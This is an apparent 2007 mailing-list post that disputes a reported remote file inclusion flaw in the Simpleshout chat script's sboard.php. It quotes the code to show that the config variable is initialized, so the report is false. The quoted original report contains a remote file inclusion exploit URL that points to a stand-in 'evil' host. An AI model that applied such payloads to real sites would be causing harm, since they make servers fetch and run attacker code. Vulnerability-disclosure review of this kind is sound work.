[VIM] false: Simpleshout sboard.php Remote File Inclusion

str0ke str0ke at milw0rm.com
Wed Feb 21 10:52:24 EST 2007


First lines of code are below:

$config = "config.php";

// Require files
require $config;

The config variable is initialized.

/str0ke

Simpleshout sboard.php Remote File Inclusion
-==-----------------------------------------
-==-----------------------------------------
download script=http://scripts.ringsworld.com/chat-scripts/simpleshout-1.6.0


file affected:sboard.php
-==---------------------
c0de:<?php
     require $config;
-==-=-------------------
exploit:

http://target/path/sboard.php?config=http://evil[script]


More information about the VIM mailing list